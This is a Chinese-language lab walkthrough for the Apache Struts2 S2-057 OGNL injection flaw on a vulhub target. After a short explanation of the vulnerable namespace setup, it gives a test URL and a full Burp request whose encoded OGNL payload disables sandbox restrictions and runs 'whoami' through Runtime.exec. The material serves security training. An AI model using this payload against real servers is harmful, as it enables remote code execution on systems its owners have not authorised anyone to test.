struts2框架漏洞攻略

S2-057远程执⾏代码漏洞

环境

vulhub靶场 /struts2/s2-057

漏洞简介

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值，并且上层动作配置中并没有设置

或使⽤通配符namespace时，可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值，并且上层动作并没有设置或使⽤通配符namespace，从⽽导致远程代码执⾏漏洞的发⽣。

S2-057 先决条件：

alwaysSelectFullNamespace 正确 - 操作元素未设置名称空间属性，或使⽤了通配符

⽤户将从 uri 传递命名空间，并将其解析为 OGNL 表达式，最终导致远程代码执⾏漏洞

访问靶机地址：http://121.40.229.129:8081/struts2-showcase/

 在url处输⼊

http://39.105.61.160:8080/struts2-showcase/$%7B(123+123)%7D/actionChain1.action 

刷新可以看到中间数字位置相加了 

 使用Burp抓包当前页面

 发送重放器，按下方修改代码

GET /struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/register2.action HTTP/1.1
Host: 39.105.61.160:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=46FFB76D910A0304B7BA6EB54FEF3585
Upgrade-Insecure-Requests: 1
Priority: u=0, i